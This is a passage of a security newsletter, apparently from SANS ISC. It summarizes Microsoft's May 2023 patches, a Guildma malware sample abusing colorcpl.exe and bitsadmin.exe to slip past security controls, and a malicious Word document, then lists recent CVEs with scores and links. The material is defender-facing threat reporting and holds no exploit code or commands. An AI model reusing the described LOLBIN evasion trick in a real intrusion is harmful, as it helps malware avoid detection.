The Consensus Security Vulnerability Alert

ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html

Microsoft May 2023 Patch Tuesday

Published: 2023-05-09

Last Updated: 2023-05-09 17:41:35 UTC

by Renato Marinho (Version: 1)

This month we got patches for 49 vulnerabilities. Of these, 6 are critical, and 2 are already being exploited, according to Microsoft.

One of the exploited vulnerabilities is a Win32k Elevation of Privilege Vulnerability (CVE-2023-29336). This vulnerability has low attack complexity, low privilege, and none user interaction. The attack vector is local, the CVSS is 7.8, and the severity is Important.

The second exploited vulnerability is Secure Boot Security Feature Bypass Vulnerability (CVE-2023-24932). According to the advisory, to exploit the vulnerability, an attacker who has physical access or Administrative rights to a target device could install an affected boot policy. The CVSS for this vulnerability is 6.7 and its severity is Important.

About the critical vulnerabilities, there is a Remote Code Execution (RCE) affecting Windows Network File System (CVE-2023-24941). According to the advisory, this vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). The advisory also details a mitigation procedure. The CVSS for this vulnerability is 9.8 – the highest for this month.

A second critical vulnerability worth mentioning is an RCE affecting Windows Lightweight Directory Access Protocol (LDAP) (CVE-2023-28283). According to the advisory, an unauthenticated attacker who successfully exploited this vulnerability could gain code execution through a specially crafted set of LDAP calls to execute arbitrary code within the context of the LDAP service. The attack complexity is high, which means that successful exploitation of this vulnerability requires an attacker to win a race condition. The CVSS for this vulnerability is 8.1.

Read the full entry:

https://isc.sans.edu/diary/Microsoft+May+2023+Patch+Tuesday/29826/

Guildma is now abusing colorcpl.exe LOLBIN

Published: 2023-05-05

Last Updated: 2023-05-05 17:00:59 UTC

by Renato Marinho (Version: 1)Published: 2023-05-05

Last Updated: 2023-05-05 17:00:59 UTC

by Renato Marinho (Version: 1)

While analyzing a Guildma (AKA Astaroth) sample recently uploaded to MalwareBazaar, we came across a chain of LOLBIN abuse. It is not uncommon to see malicious code using the LOLBIN ‘bitsadmin.exe’ to download artifacts from the Internet. However, what is interesting in this case is that Guildma first copies ‘bitsadmin.exe’ to a less suspect path using ‘colorcpl.exe’, another LOLBIN, before executing it.

The ‘colorcpl.exe’ binary is the command line tool to open the Windows Color Management panel. When used without parameters, it just opens the tool. If a file is given as a parameter, ‘colorcpl.exe’ will copy the file to the ‘c:\windows\system32\spool\drivers\color\’ path. This path is writable by any user?—?so there is nothing here related to abusing the binary to access a privileged location. It seems to be a way to not draw the attention of security controls by avoiding using the ‘copy’ command.

Read the full entry:

https://isc.sans.edu/diary/Guildma+is+now+abusing+colorcplexe+LOLBIN/29814/

Infostealer Embedded in a Word Document

Published: 2023-05-04

Last Updated: 2023-05-04 05:33:19 UTC

by Xavier Mertens (Version: 1)

When attackers design malicious documents, one of their challenges is to make the potential victim confident to perform dangerous actions: click on a link, disable a security feature, etc. The best example is probably VBA macros in Microsoft Office documents. Disabled by default, the attacker must make the user confident to enable them by clicking on the “yellow ribbon” on top of the document.

Yesterday I found a malicious document that implements another approach. The SHA256 is c2d55f54c26d6f73908c7138e999fadcb9a8617fea8f56cee943f93956adfa12 and the VT score is 27/59.

Read the full entry:

https://isc.sans.edu/diary/Infostealer+Embedded+in+a+Word+Document/29810/

Exploratory Data Analysis with CISSM Cyber Attacks Database - Part 2 (2023.05.10)

https://isc.sans.edu/diary/Exploratory+Data+Analysis+with+CISSM+Cyber+Attacks+Database+Part+2/29828/

Quickly Finding Encoded Payloads in Office Documents (2023.05.07)

https://isc.sans.edu/diary/Quickly+Finding+Encoded+Payloads+in+Office+Documents/29818/

Exploratory Data Analysis with CISSM Cyber Attacks Database - Part 1 (2023.05.06)

https://isc.sans.edu/diary/Exploratory+Data+Analysis+with+CISSM+Cyber+Attacks+Database+Part+1/29816/

The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.CVE-2023-29336 - Win32k Elevation of Privilege VulnerabilityProduct: Microsoft Win32kCVSS Score: 7.8** KEV since 2023-05-09 **NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-29336ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29336CVE-2023-24902 - Win32k Elevation of Privilege VulnerabilityProduct: Microsoft Win32kCVSS Score: 7.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24902ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24902CVE-2023-24941 - Windows Network File System Remote Code Execution VulnerabilityProduct: Microsoft Windows Network File SystemCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24941ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24941CVE-2023-24901 - Windows NFS Portmapper Information Disclosure VulnerabilityProduct: Microsoft WindowsCVSS Score: 7.5NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24901ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24901CVE-2023-24939 - Server for NFS Denial of Service VulnerabilityProduct: Microsoft Server for NFSCVSS Score: 7.5NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24939ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24939CVE-2023-24943 - Windows Pragmatic General Multicast (PGM) Remote Code Execution VulnerabilityProduct: Microsoft WindowsCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24943ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24943CVE-2023-24940 - Windows Pragmatic General Multicast (PGM) Denial of Service VulnerabilityProduct: Microsoft Windows PGMCVSS Score: 7.5NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24940ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24940CVE-2023-28283 - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution VulnerabilityProduct: Microsoft Windows Lightweight Directory Access Protocol (LDAP)CVSS Score: 8.1NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-28283ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28283CVE-2023-24932 - Secure Boot Security Feature Bypass VulnerabilityProduct: Microsoft WindowsCVSS Score: 6.7NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24932ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24932CVE-2023-1730 - SupportCandy WordPress plugin before 3.1.5 allows unauthenticated attackers to perform SQL injection attacks due to lack of input validation.Product: SupportCandy CVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-1730NVD References: https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7CVE-2023-30869 - Easy Digital Downloads plugin allows unauthenticated users to escalate privileges due to improper authentication.Product: Sandhillsdev Easy Digital DownloadsCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-30869NVD References: - https://patchstack.com/articles/critical-easy-digital-downloads-vulnerability?_s_id=cve- https://patchstack.com/database/vulnerability/easy-digital-downloads/wordpress-easy-digital-downloads-plugin-3-1-1-4-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cveCVE-2023-2479 - OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.Product: Appium Appium-DesktopCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-2479NVD References: - https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe- https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4CVE-2023-29778 - GL.iNET MT3000 4.1.0 Release 2 is vulnerable to OS Command Injection via /usr/lib/oui-httpd/rpc/logread.Product: GL-iNet GL-MT3000CVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-29778NVD References: - http://glinet.com- https://github.com/OlivierLaflamme/cve/blob/main/GL.iNET/MT3000/get_nginx_log_RCE.mdCVE-2023-2459 - Chromium: CVE-2023-2459 Inappropriate implementation in PromptsProduct: Google ChromeCVSS Score: 0NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-2459ISC Diary: https://isc.sans.edu/diary/29826MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-2459NVD References: - https://chromereleases.googleblog.co…